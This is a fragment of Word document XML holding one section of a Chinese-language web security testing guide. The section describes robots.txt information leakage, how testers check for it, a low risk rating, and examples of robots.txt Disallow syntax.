      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试指南</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6405386A" w14:textId="3639DB43" w:rsidR="00DD31AB" w:rsidRPr="00131E0D" w:rsidRDefault="001854F4" w:rsidP="002531CE">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc498434470"/>
      <w:r w:rsidRPr="00131E0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="18CC2C05" w14:textId="0DB86F55" w:rsidR="00DD31AB" w:rsidRPr="00B90F7B" w:rsidRDefault="001854F4" w:rsidP="002531CE">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc498434471"/>
      <w:r w:rsidRPr="00B90F7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>robots</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90F7B">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90F7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄漏敏感信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5A571CE5" w14:textId="5F4C7DA8" w:rsidR="000F6F15" w:rsidRPr="00657454" w:rsidRDefault="00DD31AB" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>搜索引擎可以通过</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>robots</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>文件可以获知哪些页面可以爬取，哪些页面不可以爬取。</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>Robots</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>协议是网站国际互联网界通行的道德规范，其目的是保护网站数据和敏感信息、确保用户个人信息和隐私不被侵犯，如果</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>文件编辑的太过详细，反而会泄露网站的</w:t>
      </w:r>
      <w:r w:rsidR="00E97BF0" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>敏感目录或者文件，比如网站后台路径，从而得知其使用的系统类型，从而有针对性地进行利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E5A70" w14:textId="42D3D90B" w:rsidR="00F843FF" w:rsidRPr="00657454" w:rsidRDefault="00F843FF" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377CAE4" w14:textId="4C51CE43" w:rsidR="00695E87" w:rsidRPr="00657454" w:rsidRDefault="00695E87" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、检测形式多样，工具爬虫扫描得到敏感文件的路径，从而找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>robots</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47287005" w14:textId="7962AE90" w:rsidR="00F843FF" w:rsidRPr="00657454" w:rsidRDefault="00695E87" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、手工挖掘，直接在域名后输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行查看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408207C" w14:textId="145CEDD1" w:rsidR="00DD31AB" w:rsidRPr="00657454" w:rsidRDefault="007628B3" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00F843FF" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00145B2C" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>攻击者可通过发现</w:t>
      </w:r>
      <w:r w:rsidR="00145B2C" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>robots</w:t>
      </w:r>
      <w:r w:rsidR="00145B2C" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="00145B2C" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>文件，收集网站的敏感目录或文件，从而有针对性的进行利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1A5B7" w14:textId="4B4F7E28" w:rsidR="00F843FF" w:rsidRPr="00657454" w:rsidRDefault="00F843FF" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECD2FF" w14:textId="031B7365" w:rsidR="007C37BB" w:rsidRPr="00657454" w:rsidRDefault="00AD7A0E" w:rsidP="00E9007A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>obots.txt</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>中存在</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>disallow</w:t>
      </w:r>
      <w:r w:rsidR="00952EBB" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:snapToGrid/>
        </w:rPr>
        <w:t>的具体内容泄露敏感目录信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A796E1" w14:textId="0AF5047E" w:rsidR="00F843FF" w:rsidRPr="00657454" w:rsidRDefault="00F843FF" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00083665" w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可根据实际情况，进行如下对应的修复：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2DC22F" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">User-agent: * </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表的所有的搜索引擎种类，</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个通配符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F7073" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: / </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里定义是禁止爬寻站点所有的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09AA7D" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: /admin/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里定义是禁止爬寻</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下面的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE7EE5" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: /ABC/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里定义是禁止爬寻</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ABC</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下面的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6B697" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: /cgi-bin/*.htm </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/cgi-bin/</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下的所有以</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>".htm"</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为后缀的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含子目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41877674" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: /*?* </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止访问网站中所有包含问号</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (?) </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D81171" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow: /.jpg$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止抓取网页所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021D299" w14:textId="77777777" w:rsidR="00083665" w:rsidRPr="00657454" w:rsidRDefault="00083665" w:rsidP="00E9007A">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disallow:/ab/adc.html </w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止爬取</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>adc.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00657454">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
